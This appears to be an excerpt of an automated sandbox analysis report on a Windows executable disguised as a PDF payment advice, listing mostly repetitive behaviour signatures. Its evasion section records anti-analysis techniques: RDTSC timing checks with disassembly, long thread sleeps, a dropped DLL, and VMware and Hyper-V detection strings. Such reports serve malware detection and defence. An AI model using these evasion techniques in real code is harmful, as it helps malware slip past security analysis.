            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeAPI/Special instruction interceptor: Address: 4124D10
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeAPI/Special instruction interceptor: Address: 2F04D10
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeRDTSC instruction interceptor: First address: 40E95C3 second address: 40E95C3 instructions: 0x00000000 rdtsc 0x00000002 test eax, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC038E342F6h 0x00000008 test bh, ah 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeRDTSC instruction interceptor: First address: 2EC95C3 second address: 2EC95C3 instructions: 0x00000000 rdtsc 0x00000002 test eax, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC038E20A36h 0x00000008 test bh, ah 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeMemory allocated: 34C40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeMemory allocated: 36C40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599761Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599413Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599305Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599201Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599036Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598812Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598484Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598047Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597937Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597828Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596077Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595847Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594932Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeWindow / User API: threadDelayed 2203Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeWindow / User API: threadDelayed 7653Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -29514790517935264s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7968Thread sleep count: 2203 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599761s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7968Thread sleep count: 7653 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599413s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599305s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599201s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -599036s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -598047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -597062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -596077s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595847s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -594932s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe TID: 7964Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599761Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599413Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599305Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599201Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 599036Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598812Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598484Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 598047Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597937Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597828Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 596077Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595847Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594932Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeThread delayed: delay time: 594500Jump to behavior
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000000.00000002.2072901327.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004990000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
